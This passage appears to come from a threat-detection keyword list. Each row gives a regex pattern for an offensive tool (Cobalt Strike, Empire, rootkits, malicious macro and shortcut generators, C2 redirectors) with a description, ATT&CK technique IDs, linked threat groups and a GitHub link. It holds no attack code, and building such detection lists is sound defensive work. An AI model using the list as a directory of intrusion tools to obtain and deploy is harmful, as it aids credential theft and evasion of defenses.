Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_nt_trans_packet*",".{0,1000}make_smb1_nt_trans_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_trans2_explo*",".{0,1000}make_smb1_trans2_explo.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb2_payload_body_packet*",".{0,1000}make_smb2_payload_body_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb2_payload_headers_packet*",".{0,1000}make_smb2_payload_headers_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*makebof.bat*",".{0,1000}makebof\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*MakeHTTPSmugglerJAR.launch*",".{0,1000}MakeHTTPSmugglerJAR\.launch.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - 
T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","683","110","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" "*MakeMeEnterpriseAdmin.ps1*",".{0,1000}MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Maldev-Academy/HellHall*",".{0,1000}Maldev\-Academy\/HellHall.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*Malicious program execve hijacker executed*",".{0,1000}Malicious\sprogram\sexecve\shijacker\sexecuted.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Malicious Shortcut Generator*",".{0,1000}Malicious\sShortcut\sGenerator.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*Malicious Shortcut(.lnk) 
Generator*",".{0,1000}Malicious\sShortcut\(\.lnk\)\sGenerator.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*malicious.csproj*",".{0,1000}malicious\.csproj.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1445","249","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*malicious.dll*",".{0,1000}malicious\.dll.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*MaliciousInjectedDll.dll*",".{0,1000}MaliciousInjectedDll\.dll.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*MaliciousMacroGenerator*",".{0,1000}MaliciousMacroGenerator.{0,1000}","offensive_tool_keyword","MaliciousMacroGenerator","Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.","T1027 - T1564 - T1127 
- T1059 - T1562","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator","1","0","N/A","N/A","9","816","203","2019-04-17T19:47:38Z","2016-09-21T23:18:14Z" "*MaliciousMacroMSBuild-master*",".{0,1000}MaliciousMacroMSBuild\-master.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*Malleable C2 Files*",".{0,1000}Malleable\sC2\sFiles.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*Malleable 
PE/Stage*",".{0,1000}Malleable\sPE\/Stage.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*malleable_redirector.py*",".{0,1000}malleable_redirector\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*malleable_redirector_hidden_api_endpoint*",".{0,1000}malleable_redirector_hidden_api_endpoint.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*Malleable-C2-Profiles*",".{0,1000}Malleable\-C2\-Profiles.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Malleable-C2-Randomizer*",".{0,1000}Malleable\-C2\-Randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*Malleable-C2-Randomizer*",".{0,1000}Malleable\-C2\-Randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary 
Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*malleable-c2-randomizer.py*",".{0,1000}malleable\-c2\-randomizer\.py.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*MalleableProfileB64*",".{0,1000}MalleableProfileB64.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - 
T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*MalleableProfiles.vue*",".{0,1000}MalleableProfiles\.vue.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" "*malleable-redirector-config*",".{0,1000}malleable\-redirector\-config.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*MalSCCM.exe*",".{0,1000}MalSCCM\.exe.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*MalSCCM-main*",".{0,1000}MalSCCM\-main.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" 
"*malware.NewConfig*",".{0,1000}malware\.NewConfig.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*malwaredllc*",".{0,1000}malwaredllc.{0,1000}","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from 